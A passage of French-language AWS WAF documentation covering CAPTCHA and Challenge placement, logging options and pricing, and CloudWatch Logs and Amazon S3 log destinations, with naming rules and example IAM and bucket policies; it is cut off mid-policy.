Déterminez où placer les casse-têtes CAPTCHA ou les défis silencieux en fonction de l'utilisation de votre site Web, de la sensibilité des données que vous souhaitez protéger et du type de demandes. Sélectionnez les requêtes pour lesquelles vous allez appliquer le CAPTCHA afin de présenter les puzzles selon les besoins, mais évitez de les présenter là où ils ne seraient pas utiles et pourraient dégrader l'expérience utilisateur. Utilisez cette Challenge action pour exécuter des défis silencieux qui ont moins d'impact sur l'utilisateur final, tout en permettant de vérifier que la demande provient d'un navigateur JavaScript activé. 

Les puzzles CAPTCHA et les défis silencieux ne peuvent être exécutés que lorsque les navigateurs accèdent à des points de terminaison HTTPS. Les clients du navigateur doivent fonctionner dans des contextes sécurisés pour acquérir des jetons. 

**Décidez où lancer les puzzles CAPTCHA et les défis silencieux à vos clients**  
Identifiez les demandes que vous ne souhaitez pas voir affectées par le CAPTCHA, par exemple les demandes de CSS ou d'images. Utilisez le CAPTCHA uniquement lorsque cela est nécessaire. Par exemple, si vous prévoyez d'effectuer une vérification CAPTCHA lors de la connexion et que l'utilisateur passe toujours directement de l'identifiant à un autre écran, il ne sera probablement pas nécessaire d'exiger une vérification CAPTCHA sur le deuxième écran et cela pourrait dégrader votre expérience utilisateur final. 

Configurez Challenge et CAPTCHA utilisez-le de manière à ce AWS WAF qu'il n'envoie que des puzzles CAPTCHA et des défis silencieux en réponse à `GET` `text/html` des demandes. Vous ne pouvez exécuter ni le puzzle ni le défi en réponse à des `POST` demandes, à des demandes de partage de ressources entre origines (CORS) avant le vol ou à tout autre type de `OPTIONS` demande autre que le type de demande. `GET` Le comportement du navigateur pour les autres types de requêtes peut varier et peut ne pas être en mesure de gérer correctement les interstitiels. 

Il est possible qu'un client accepte le HTML mais ne soit toujours pas en mesure de gérer le CAPTCHA ou de défier l'interstitiel. Par exemple, un widget sur une page Web avec un petit iFrame peut accepter le HTML mais ne pas être en mesure d'afficher un CAPTCHA ou de le traiter. Évitez de placer les actions de règle pour ces types de demandes, de la même manière que pour les demandes qui n'acceptent pas le HTML.

**Utiliser CAPTCHA ou Challenge vérifier l'acquisition antérieure de jetons**  
Vous pouvez utiliser les actions des règles uniquement pour vérifier l'existence d'un jeton valide, aux endroits où les utilisateurs légitimes doivent toujours en avoir un. Dans ces situations, peu importe que la demande puisse gérer les interstitiels. 

Par exemple, si vous implémentez l'API CAPTCHA de l'application JavaScript client et que vous exécutez le puzzle CAPTCHA sur le client juste avant d'envoyer la première demande à votre point de terminaison protégé, votre première demande doit toujours inclure un jeton valide à la fois pour le challenge et pour le CAPTCHA. Pour plus d'informations sur l'intégration des applications JavaScript clientes, consultez[AWS WAF JavaScript intégrations](waf-javascript-api.md). 

Dans ce cas, dans votre pack de protection (ACL Web), vous pouvez ajouter une règle correspondant à ce premier appel et la configurer avec l'action de CAPTCHA règle Challenge or. Lorsque la règle correspond à un utilisateur final et à un navigateur légitimes, l'action trouvera un jeton valide et ne bloquera donc pas la demande ni n'enverra de défi ou de casse-tête CAPTCHA en réponse. Pour plus d'informations sur le fonctionnement des actions des règles, consultez[CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md).

**Protégez vos données sensibles non HTML avec et CAPTCHA Challenge**  
Vous pouvez utiliser le CAPTCHA et les Challenge protections pour les données sensibles non HTML, par exemple en suivant APIs l'approche suivante. 

1. Identifiez les demandes qui acceptent des réponses HTML et qui sont exécutées à proximité des demandes concernant vos données sensibles non HTML. 

1. CAPTCHARédigez des Challenge règles qui correspondent aux demandes de code HTML et aux demandes relatives à vos données sensibles. 

1. Ajustez vos paramètres de durée CAPTCHA et d'Challengeimmunité afin que, pour les interactions normales avec les utilisateurs, les jetons que les clients obtiennent à partir des requêtes HTML soient disponibles et non expirés dans leurs demandes concernant vos données sensibles. Pour plus d'informations sur le réglage, voir[Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).

Lorsqu'une demande concernant vos données sensibles correspond à une Challenge règle CAPTCHA OR, elle ne sera pas bloquée si le client possède toujours un jeton valide issu du puzzle ou du défi précédent. Si le jeton n'est pas disponible ou si l'horodatage a expiré, la demande d'accès à vos données sensibles échouera. Pour plus d'informations sur le fonctionnement des actions des règles, consultez[CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md).

**Utilisez le CAPTCHA Challenge pour ajuster vos règles existantes**  
Passez en revue vos règles existantes pour voir si vous souhaitez les modifier ou les compléter. Voici quelques scénarios courants à prendre en compte. 
+ Si vous avez une règle basée sur le taux qui bloque le trafic, mais que vous maintenez la limite de débit relativement élevée pour éviter de bloquer les utilisateurs légitimes, envisagez d'ajouter une deuxième règle basée sur le taux après la règle de blocage. Donnez à la deuxième règle une limite inférieure à la règle de blocage et définissez l'action de la règle sur CAPTCHA ouChallenge. La règle de blocage bloquera toujours les demandes qui arrivent à un rythme trop élevé, et la nouvelle règle bloquera la plupart du trafic automatisé à un taux encore plus faible. Pour plus d'informations sur les règles basées sur les taux, consultez[Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md).
+ Si vous avez un groupe de règles géré qui bloque les demandes, vous pouvez modifier le comportement de certaines ou de toutes les règles de CAPTCHA ou Block versChallenge. Pour ce faire, dans la configuration du groupe de règles géré, remplacez le paramètre d'action de la règle. Pour plus d'informations sur le remplacement des actions des règles, consultez[Les actions des règles du groupe de règles remplacent les actions](web-acl-rule-group-override-options.md#web-acl-rule-group-override-options-rules). 

**Testez votre CAPTCHA et testez les implémentations avant de les déployer**  
En ce qui concerne toutes les nouvelles fonctionnalités, suivez les instructions sur[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

Pendant les tests, passez en revue les exigences d'expiration de l'horodatage de vos jetons et définissez les configurations de votre ACL Web et de la durée d'immunité au niveau des règles afin de trouver un bon équilibre entre le contrôle de l'accès à votre site Web et l'offre d'une bonne expérience à vos clients. Pour plus d'informations, consultez [Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).

# Protection des données et journalisation pour le trafic du pack de AWS WAF protection (ACL Web)
<a name="waf-data-protection-and-logging"></a>

Cette section explique les options d'enregistrement, de collecte et de protection des données que vous pouvez utiliser AWS WAF. Les options sont les suivantes : 
+ **Journalisation** : vous pouvez configurer votre pack de protection (ACL Web) pour envoyer les journaux du trafic des requêtes Web à la destination de journalisation de votre choix. Vous pouvez configurer la rédaction et le filtrage des champs pour ce choix. La journalisation utilise les données disponibles une fois que les paramètres de protection des données ont été appliqués. 

  Pour de plus amples informations sur cette option, veuillez consulter [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
+ **Échantillonnage de demandes** : vous pouvez configurer votre pack de protection (ACL Web) pour échantillonner les requêtes Web qu'il évalue, afin de vous faire une idée du type de trafic reçu par votre application. L'échantillonnage des demandes utilise les données disponibles une fois que les paramètres de protection des données ont été appliqués. 

  Pour de plus amples informations sur cette option, veuillez consulter [Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 
+ **Amazon Security Lake** : vous pouvez configurer Security Lake pour collecter les données du pack de protection (ACL Web). Security Lake collecte les données des journaux et des événements à partir de diverses AWS sources à des fins de normalisation, d'analyse et de gestion. Security Lake collecte des données à partir des données disponibles une fois que les paramètres de protection des données ont été appliqués. 

  Pour plus d'informations sur cette option, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 

  AWS WAF l'utilisation de cette option ne vous est pas facturée. Pour plus d'informations sur les tarifs, consultez [les sections Tarification](https://aws.amazon.com/security-lake/pricing/) de [Security Lake et Comment la tarification de Security Lake est déterminée](https://docs.aws.amazon.com/security-lake/latest/userguide/estimating-costs.html) dans le *guide de l'utilisateur d'Amazon Security Lake*.
+ **Protection des données** : vous pouvez configurer la protection des données relatives au trafic Web à deux niveaux : 
  + **Protection des données pour le pack de protection (ACL Web)** : vous pouvez configurer la protection des données pour chaque pack de protection (ACL Web), ce qui vous permet de remplacer certaines données de trafic Web par des chaînes statiques ou un hachage cryptographique. La protection des données à ce niveau peut être configurée de manière centralisée et s'applique à toutes les options de journalisation et de collecte de données.

    Pour de plus amples informations sur cette option, veuillez consulter [Protection des données](data-protection-masking.md). 
  + **Rédaction et filtrage** de la journalisation : pour la journalisation uniquement, vous pouvez configurer certaines données de trafic Web pour la suppression à partir des journaux, et vous pouvez filtrer les données que vous enregistrez. Cette option s'ajoute à tout paramètre de protection des données que vous avez configuré, et elle n'affecte que les données AWS WAF envoyées à la destination de journalisation configurée. 

**Topics**
+ [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md)
+ [Protection des données](data-protection-masking.md)

# Trafic du pack de AWS WAF protection de journalisation (ACL Web)
<a name="logging"></a>

Cette section explique les options de journalisation de vos packs de AWS WAF protection (Web ACLs). 

Vous pouvez activer la journalisation pour obtenir des informations détaillées sur le trafic qui est analysé par votre liste ACL web. Les informations enregistrées incluent l'heure à laquelle vous avez AWS WAF reçu une demande Web de votre AWS ressource, des informations détaillées sur la demande et des détails sur les règles auxquelles la demande correspondait. Vous pouvez envoyer les journaux du pack de protection (ACL Web) à un groupe de CloudWatch journaux Amazon Logs, à un bucket Amazon Simple Storage Service (Amazon S3) ou à un flux de diffusion Amazon Data Firehose.

Outre les journaux que vous pouvez activer pour vos packs de protection (Web ACLs), utilise AWS également les journaux de service du trafic des sites Web ou des applications traité par AWS WAF celui-ci pour fournir une assistance et protéger la sécurité des AWS clients et des services.

**Note**  
La configuration de journalisation du pack de protection (ACL Web) n'affecte que les AWS WAF journaux. En particulier, la configuration des champs expurgés pour la journalisation n'a aucun impact sur l'échantillonnage des demandes ou sur la collecte de données par Security Lake. Vous pouvez exclure des champs de la collecte ou de l'échantillonnage en configurant la protection des données du pack de protection (ACL Web). Outre la protection des données, la collecte de données par Security Lake est entièrement configurée via le service Security Lake. 

**Topics**
+ [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md)
+ [AWS WAF destinations de journalisation](logging-destinations.md)
+ [Configuration de la journalisation pour un pack de protection (ACL Web)](logging-management-configure.md)
+ [Trouver les enregistrements de votre pack de protection (ACL Web)](logging-management.md)
+ [Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md)
+ [Exemples de journaux pour le trafic du pack de protection (ACL Web)](logging-examples.md)

**Autres options de collecte et d'analyse des données**  
Outre la journalisation, vous pouvez activer les options suivantes pour la collecte et l'analyse des données : 
+ **Amazon Security Lake** : vous pouvez configurer Security Lake pour collecter les données du pack de protection (ACL Web). Security Lake collecte les données des journaux et des événements à partir de diverses sources à des fins de normalisation, d'analyse et de gestion. Pour plus d'informations sur cette option, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 

  AWS WAF l'utilisation de cette option ne vous est pas facturée. Pour plus d'informations sur les tarifs, consultez [les sections Tarification](https://aws.amazon.com/security-lake/pricing/) de [Security Lake et Comment la tarification de Security Lake est déterminée](https://docs.aws.amazon.com/security-lake/latest/userguide/estimating-costs.html) dans le *guide de l'utilisateur d'Amazon Security Lake*. 
+ **Échantillonnage de demandes** : vous pouvez configurer votre pack de protection (ACL Web) pour échantillonner les requêtes Web qu'il évalue, afin de vous faire une idée du type de trafic reçu par votre application. Pour de plus amples informations sur cette option, veuillez consulter [Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

# Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)
<a name="logging-pricing"></a>

Cette section explique les considérations tarifaires relatives à l'utilisation des journaux de trafic des packs de protection (ACL Web).

Les informations de trafic du pack de protection de journalisation (ACL Web) vous sont facturées en fonction des coûts associés à chaque type de destination de journal. Ces frais s'ajoutent aux frais d'utilisation AWS WAF. Vos coûts peuvent varier en fonction de facteurs tels que le type de destination que vous choisissez et la quantité de données que vous enregistrez. 

Vous trouverez ci-dessous des liens vers les informations tarifaires pour chaque type de destination de journalisation :
+ **CloudWatch Journaux** — Les frais concernent la livraison des bûches vendues. Consultez les [tarifs d'Amazon CloudWatch Logs](https://aws.amazon.com/cloudwatch/pricing/). Sous **Paid Tier**, choisissez l'onglet **Logs**, puis sous **Vended Logs**, consultez les informations relatives à la **livraison aux CloudWatch journaux**.
+ Compartiments **Amazon S3** — Les frais Amazon S3 sont les frais combinés pour la livraison CloudWatch des journaux vers les compartiments Amazon S3 et pour l'utilisation d'Amazon S3. 
  + Pour Amazon S3, consultez la [tarification d'Amazon S3](https://aws.amazon.com/s3/pricing/). 
  + Pour la livraison CloudWatch des journaux par Logs à Amazon S3, consultez la [tarification d'Amazon CloudWatch Logs](https://aws.amazon.com/cloudwatch/pricing/). Sous **Paid Tier**, choisissez l'onglet **Logs**, puis sous **Vended Logs**, consultez les informations relatives à la **livraison à S3**
+ **Firehose — Consultez** les tarifs d'[Amazon Data Firehose](https://aws.amazon.com/kinesis/data-firehose/pricing/).

Pour plus d'informations sur la AWS WAF tarification, consultez la section [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/). 

# AWS WAF destinations de journalisation
<a name="logging-destinations"></a>

Cette section décrit les options de journalisation que vous pouvez choisir pour vos AWS WAF journaux. Chaque section fournit des conseils pour configurer la journalisation, y compris des informations sur tout comportement spécifique au type de destination. Après avoir configuré la destination de journalisation, vous pouvez fournir ses spécifications à la configuration de journalisation de votre pack de protection (ACL Web) pour commencer à vous y connecter.

**Topics**
+ [CloudWatch Journaux](logging-cw-logs.md)
+ [Amazon S3](logging-s3.md)
+ [Firehose](logging-kinesis.md)

# Envoi des journaux de trafic du pack de protection (ACL Web) à un groupe de CloudWatch journaux Amazon Logs
<a name="logging-cw-logs"></a>

Cette rubrique fournit des informations sur l'envoi des journaux de trafic de votre pack de protection (ACL Web) à un groupe de CloudWatch journaux de journaux. 

**Note**  
La connexion vous est facturée en plus des frais d'utilisation AWS WAF. Pour plus d'informations, consultez [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md).

Pour envoyer des journaux à Amazon CloudWatch Logs, vous devez créer un groupe de CloudWatch journaux de journaux. Lorsque vous activez la connexion AWS WAF, vous fournissez l'ARN du groupe de journaux. Une fois que vous avez activé la journalisation pour votre pack de protection (ACL Web), AWS WAF les journaux sont transmis au groupe de CloudWatch journaux Logs dans les flux de journaux. 

Lorsque vous utilisez CloudWatch Logs, vous pouvez explorer les journaux de votre pack de protection (ACL Web) dans la AWS WAF console. Sur la page de votre pack de protection (ACL Web), sélectionnez l'onglet **Logging Insights**. Cette option s'ajoute aux informations de journalisation fournies aux CloudWatch journaux via la CloudWatch console. 

Configurez le groupe de journaux pour les journaux du pack de AWS WAF protection (ACL Web) dans la même région que le pack de protection (ACL Web) et en utilisant le même compte que celui que vous utilisez pour gérer le pack de protection (ACL Web). Pour plus d'informations sur la configuration d'un groupe de CloudWatch journaux, consultez la section [Utilisation des groupes de journaux et des flux de journaux](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html).

## Quotas pour CloudWatch les groupes de journaux
<a name="logging-cw-logs-quotas"></a>

CloudWatch Les journaux ont un quota de débit maximal par défaut, partagé entre tous les groupes de journaux d'une région, que vous pouvez demander à augmenter. Si vos exigences de journalisation sont trop élevées par rapport au paramètre de débit actuel, des mesures de limitation s'afficheront `PutLogEvents` pour votre compte. Pour consulter la limite dans la console Service Quotas et demander une augmentation, consultez le [ PutLogEvents quota de CloudWatch logs](https://console.aws.amazon.com/servicequotas/home/services/logs/quotas/L-7E1FAE88).

## Désignation des groupes de journaux
<a name="logging-cw-logs-naming"></a>

Les noms de vos groupes de journaux doivent commencer par `aws-waf-logs-` et peuvent se terminer par le suffixe de votre choix, `aws-waf-logs-testLogGroup2` par exemple.

Le format ARN obtenu est le suivant : 

```
arn:aws:logs:Region:account-id:log-group:aws-waf-logs-log-group-suffix
```

Les flux de journaux ont le format de dénomination suivant : 

```
Region_web-acl-name_log-stream-number
```

Voici un exemple de flux de journal pour le pack de protection (ACL Web) `TestWebACL` dans Region`us-east-1`. 

```
us-east-1_TestWebACL_0
```

## Autorisations requises pour publier des journaux dans CloudWatch Logs
<a name="logging-cw-logs-permissions"></a>

La configuration de la journalisation du trafic du pack de protection (ACL Web) pour un groupe de CloudWatch journaux de journaux nécessite les paramètres d'autorisation décrits dans cette section. Les autorisations sont définies pour vous lorsque vous utilisez l'une des politiques gérées d'accès AWS WAF complet, `AWSWAFConsoleFullAccess` ou`AWSWAFFullAccess`. Si vous souhaitez gérer un accès plus précis à votre journalisation et à vos AWS WAF ressources, vous pouvez définir vous-même les autorisations. Pour plus d'informations sur la gestion des autorisations, consultez la section [Gestion de l'accès aux AWS ressources](https://docs.aws.amazon.com/IAM/latest/UserGuide/access.html) dans le *Guide de l'utilisateur IAM*. Pour plus d'informations sur les politiques AWS WAF gérées, consultez[AWS politiques gérées pour AWS WAF](security-iam-awsmanpol.md). 

Ces autorisations vous permettent de modifier la configuration de journalisation du pack de protection (ACL Web), de configurer la livraison des CloudWatch journaux et de récupérer des informations sur votre groupe de journaux. Ces autorisations doivent être associées à l'utilisateur que vous utilisez pour gérer AWS WAF. 

------
#### [ JSON ]

****  

```
{
    "Version":"2012-10-17",		 	 	 
    "Statement": [
        {
            "Action": [
                "wafv2:PutLoggingConfiguration",
                "wafv2:DeleteLoggingConfiguration"
            ],
            "Resource": [
                "*"
            ],
            "Effect": "Allow",
            "Sid": "LoggingConfigurationAPI"
        },
        {
            "Sid": "WebACLLoggingCWL",
            "Action": [
                "logs:CreateLogDelivery",
                "logs:DeleteLogDelivery",
                "logs:PutResourcePolicy",
                "logs:DescribeResourcePolicies",
                "logs:DescribeLogGroups"
            ],
            "Resource": [
                "*"
            ],
            "Effect": "Allow"
        }
    ]
}
```

------

Lorsque des actions sont autorisées sur toutes les AWS ressources, cela est indiqué dans la politique avec un `"Resource"` paramètre de`"*"`. Cela signifie que les actions sont autorisées sur toutes les AWS ressources prises *en charge par chaque action*. Par exemple, l'action n'`wafv2:PutLoggingConfiguration`est prise en charge que pour la `wafv2` journalisation des ressources de configuration. 

# Envoi des journaux de trafic du pack de protection (ACL Web) vers un bucket Amazon Simple Storage Service
<a name="logging-s3"></a>

Cette rubrique fournit des informations sur l'envoi des journaux de trafic de votre pack de protection (ACL Web) vers un compartiment Amazon S3. 

**Note**  
La connexion vous est facturée en plus des frais d'utilisation AWS WAF. Pour plus d'informations, consultez [Tarification des informations relatives au trafic du pack de protection de journalisation (ACL Web)](logging-pricing.md).

Pour envoyer les journaux de trafic de votre pack de protection (ACL Web) à Amazon S3, vous configurez un compartiment Amazon S3 à partir du même compte que celui que vous utilisez pour gérer le pack de protection (ACL Web), et vous nommez le compartiment en commençant par`aws-waf-logs-`. Lorsque vous activez la connexion AWS WAF, vous indiquez le nom du compartiment. Pour plus d'informations sur la création d'un bucket de journalisation, consultez [Create a Bucket](https://docs.aws.amazon.com/AmazonS3/latest/userguide/CreatingABucket.html) dans le *guide de l'utilisateur d'Amazon Simple Storage Service*.

Vous pouvez accéder à vos journaux Amazon S3 et les analyser à l'aide du service de requêtes interactif Amazon Athena. Athena facilite l'analyse des données directement dans Amazon S3 à l'aide du SQL standard. En effectuant quelques actions AWS Management Console, vous pouvez pointer Athena vers les données stockées dans Amazon S3 et commencer rapidement à utiliser le SQL standard pour exécuter des requêtes ad hoc et obtenir des résultats. Pour plus d'informations, consultez la section [Interrogation des AWS WAF journaux](https://docs.aws.amazon.com/athena/latest/ug/waf-logs.html) dans le guide de l'*utilisateur d'Amazon Athena*. Pour des exemples de requêtes Amazon Athena supplémentaires, consultez [waf-log-sample-athenaaws-samples/](https://github.com/aws-samples/waf-log-sample-athena-queries) -queries sur le site Web. GitHub 

**Note**  
AWS WAF prend en charge le chiffrement avec des compartiments Amazon S3 pour le type de clé Amazon S3 (SSE-S3) et pour AWS Key Management Service (SSE-KMS). AWS KMS keys AWS WAF ne prend pas en charge le chiffrement des AWS Key Management Service clés gérées par AWS.

Les fichiers journaux de votre pack de protection (ACL Web) sont publiés dans le compartiment Amazon S3 toutes les 5 minutes. Chaque fichier journal contient des enregistrements du trafic enregistré au cours des 5 minutes précédentes.

La taille maximale d'un fichier journal est de 75 Mo. Si le fichier journal atteint la taille limite de fichier dans un délai de 5 minutes, le journal arrête d'y ajouter des enregistrements, le publie dans le compartiment Amazon S3, puis crée un nouveau fichier journal.

Les fichiers journaux sont compressés. Si vous ouvrez les fichiers à l'aide de la console Amazon S3, Amazon S3 décompresse les enregistrements du journal et les affiche. Si vous téléchargez les fichiers journaux, vous devez les décompresser pour afficher les enregistrements.

Un seul fichier journal contient des entrées entrelacées avec plusieurs enregistrements. Pour consulter tous les fichiers journaux d'un pack de protection (ACL Web), recherchez les entrées agrégées par nom du pack de protection (ACL Web), région et ID de compte.

## Exigences en matière de dénomination et syntaxe
<a name="logging-s3-naming"></a>

Les noms des compartiments pour la AWS WAF journalisation doivent commencer par `aws-waf-logs-` et peuvent se terminer par le suffixe de votre choix. Par exemple, `aws-waf-logs-LOGGING-BUCKET-SUFFIX`. 

**Emplacement du godet**  
Les emplacements des compartiments utilisent la syntaxe suivante : 

```
s3://aws-waf-logs-LOGGING-BUCKET-SUFFIX/
```

**ARN de compartiment**  
Le format du bucket Amazon Resource Name (ARN) est le suivant : 

```
arn:aws:s3:::aws-waf-logs-LOGGING-BUCKET-SUFFIX
```

**Emplacements des compartiments avec préfixes**  
Si vous utilisez des préfixes dans le nom de vos clés d'objet pour organiser les données que vous stockez dans vos compartiments, vous pouvez fournir vos préfixes dans les noms de vos compartiments de journalisation.

**Note**  
Cette option n'est pas disponible via la console. Utilisez AWS WAF APIs la CLI ou AWS CloudFormation.

Pour plus d'informations sur l'utilisation des préfixes dans Amazon S3, consultez la section [Organisation des objets à l'aide de préfixes](https://docs.aws.amazon.com/AmazonS3/latest/userguide/using-prefixes.html) dans le guide de l'*utilisateur d'Amazon Simple Storage Service*. 

Les emplacements des compartiments dotés de préfixes utilisent la syntaxe suivante : 

```
s3://aws-waf-logs-LOGGING-BUCKET-SUFFIX/KEY-NAME-PREFIX/
```

**Dossiers de compartiments et noms de fichiers**  
À l'intérieur de vos compartiments, et après les préfixes que vous fournissez, vos AWS WAF journaux sont écrits dans une structure de dossiers déterminée par votre identifiant de compte, la région, le nom du pack de protection (ACL Web), ainsi que la date et l'heure. 

```
AWSLogs/account-id/WAFLogs/Region/web-acl-name/YYYY/MM/dd/HH/mm
```

À l'intérieur des dossiers, les noms des fichiers journaux suivent un format similaire : 

```
account-id_waflogs_Region_web-acl-name_timestamp_hash.log.gz
```

Les spécifications temporelles utilisées dans la structure des dossiers et dans le nom du fichier journal sont conformes à la spécification du format d'horodatage. `YYYYMMddTHHmmZ`

Voici un exemple de fichier journal dans un compartiment Amazon S3 pour un compartiment nommé`aws-waf-logs-LOGGING-BUCKET-SUFFIX`. L' Compte AWS est`11111111111`. Le pack de protection (ACL Web) est `TEST-WEBACL` et la région est`us-east-1`.

```
s3://aws-waf-logs-LOGGING-BUCKET-SUFFIX/AWSLogs/11111111111/WAFLogs/us-east-1/TEST-WEBACL/2021/10/28/19/50/11111111111_waflogs_us-east-1_TEST-WEBACL_20211028T1950Z_e0ca43b5.log.gz
```

**Note**  
Les noms de vos compartiments pour la AWS WAF journalisation doivent commencer par `aws-waf-logs-` et peuvent se terminer par le suffixe de votre choix. 

## Autorisations requises pour publier des journaux sur Amazon S3
<a name="logging-s3-permissions"></a>

La configuration de la journalisation du trafic du pack de protection (ACL Web) pour un compartiment Amazon S3 nécessite les paramètres d'autorisation suivants. Ces autorisations sont définies pour vous lorsque vous utilisez l'une des politiques gérées d'accès AWS WAF complet, `AWSWAFConsoleFullAccess` ou`AWSWAFFullAccess`. Si vous souhaitez gérer davantage l'accès à votre journal et à vos AWS WAF ressources, vous pouvez définir ces autorisations vous-même. Pour plus d'informations sur la gestion des autorisations, consultez la section [Gestion de l'accès aux AWS ressources](https://docs.aws.amazon.com/IAM/latest/UserGuide/access.html) dans le *Guide de l'utilisateur IAM*. Pour plus d'informations sur les politiques AWS WAF gérées, consultez[AWS politiques gérées pour AWS WAF](security-iam-awsmanpol.md). 

Les autorisations suivantes vous permettent de modifier la configuration de journalisation du pack de protection (ACL Web) et de configurer la livraison des journaux vers votre compartiment Amazon S3. Ces autorisations doivent être associées à l'utilisateur que vous utilisez pour gérer AWS WAF. 

**Note**  
Lorsque vous définissez les autorisations répertoriées ci-dessous, vous pouvez voir des erreurs dans vos AWS CloudTrail journaux indiquant que l'accès a été refusé, mais que les autorisations sont correctes pour la AWS WAF journalisation. 

------
#### [ JSON ]

****  

```
{
   "Version":"2012-10-17",		 	 	 
   "Statement":[
      {
         "Action":[
            "wafv2:PutLoggingConfiguration",
            "wafv2:DeleteLoggingConfiguration"
         ],
         "Resource":[
            "*"
         ],
         "Effect":"Allow",
         "Sid":"LoggingConfigurationAPI"
      },
    {                                                                                                                                                                
       "Sid":"WebACLLogDelivery",                                                                                                                                    
       "Action":[                                                                                                                                                    
          "logs:CreateLogDelivery",                                                                                                                                  
          "logs:DeleteLogDelivery"                                                                                                                                   
       ],                                                                                                                                                            
       "Resource": "*",                                                                                                                                              
       "Effect":"Allow"                                                                                                                                              
    },  
      {
         "Sid":"WebACLLoggingS3",
         "Action":[
            "s3:PutBucketPolicy",
            "s3:GetBucketPolicy"
         ],
         "Resource": [
         "arn:aws:s3:::aws-waf-logs-amzn-s3-demo-destination-bucket-suffix"
         ],
         "Effect":"Allow"
      }
   ]
}
```

------

Lorsque des actions sont autorisées sur toutes les AWS ressources, cela est indiqué dans la politique avec un `"Resource"` paramètre de`"*"`. Cela signifie que les actions sont autorisées sur toutes les AWS ressources prises *en charge par chaque action*. Par exemple, l'action n'`wafv2:PutLoggingConfiguration`est prise en charge que pour la `wafv2` journalisation des ressources de configuration. 

Par défaut, les compartiments Amazon S3 et les objets qu'ils contiennent sont privés. Seul le propriétaire du compartiment peut accéder au compartiment et aux objets qui y sont stockés. Le propriétaire du bucket peut toutefois accorder l'accès à d'autres ressources et utilisateurs en rédigeant une politique d'accès.

Si l'utilisateur qui crée le journal est propriétaire du compartiment, le service attache automatiquement la politique suivante au compartiment pour autoriser le journal à y publier des journaux : 

------
#### [ JSON ]

****  

```
{
  "Version":"2012-10-17",		 	 	 
  "Statement": [
    {
      "Sid": "AWSLogDeliveryWrite",
      "Effect": "Allow",
      "Principal": {
        "Service": "delivery.logs.amazonaws.com"
      },
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::aws-waf-logs-amzn-s3-demo-destination-bucket-suffix/AWSLogs/123456789012/*",
      "Condition": {
        "StringEquals": {
          "s3:x-amz-acl": "bucket-owner-full-control",
          "aws:SourceAccount": ["123456789012"]
        },
        "ArnLike": {
        "aws:SourceArn": ["arn:aws:logs:us-east-2:123456789012:*"]
        }
      }
    },
    {
      "Sid": "AWSLogDeliveryAclCheck",
      "Effect": "Allow",
      "Principal": {
        "Service": "delivery.logs.amazonaws.com"
      },
      "Action": "s3:GetBucketAcl",
      "Resource": "arn:aws:s3:::aws-waf-logs-amzn-s3-demo-destination-bucket-suffix",
      "Condition": {
        "StringEquals": {
        "aws:SourceAccount": ["123456789012"]
        },
        "ArnLike": {
        "aws:SourceArn": ["arn:aws:logs:us-east-2:123456789012:*"]
        }
      }
    }
  ]
}
```

------

**Note**  
Les noms de vos compartiments pour la AWS WAF journalisation doivent commencer par `aws-waf-logs-` et peuvent se terminer par le suffixe de votre choix. 

Si l'utilisateur qui crée le journal n'est pas propriétaire du compartiment ou ne dispose pas des `PutBucketPolicy` autorisations `GetBucketPolicy` et pour le compartiment, la création du journal échoue. Dans ce cas, le propriétaire du compartiment doit ajouter manuellement la politique précédente au compartiment et spécifier l' Compte AWS ID du créateur du journal. Pour de plus amples informations, veuillez consulter [Comment ajouter une politique de compartiment S3](https://docs.aws.amazon.com/AmazonS3/latest/userguide/add-bucket-policy.html) dans le *Guide de l'utilisateur Amazon Simple Storage Service*. Si le bucket reçoit les journaux de plusieurs comptes, ajoutez une entrée d'`Resource`élément à la déclaration de `AWSLogDeliveryWrite` politique pour chaque compte. 

Par exemple, la politique de compartiment suivante permet Compte AWS `111122223333` de publier des journaux dans un compartiment nommé `aws-waf-logs-LOGGING-BUCKET-SUFFIX` :

------
#### [ JSON ]

****  

```
{
    "Version":"2012-10-17",		 	 	 
    "Id": "AWSLogDeliveryWrite20150319",
    "Statement": [
        {
            "Sid": "AWSLogDeliveryWrite",
            "Effect": "Allow",
            "Principal": {
                "Service": "delivery.logs.amazonaws.com"
            },
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::aws-waf-logs-amzn-s3-demo-destination-bucket-suffix/AWSLogs/111122223333/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control",
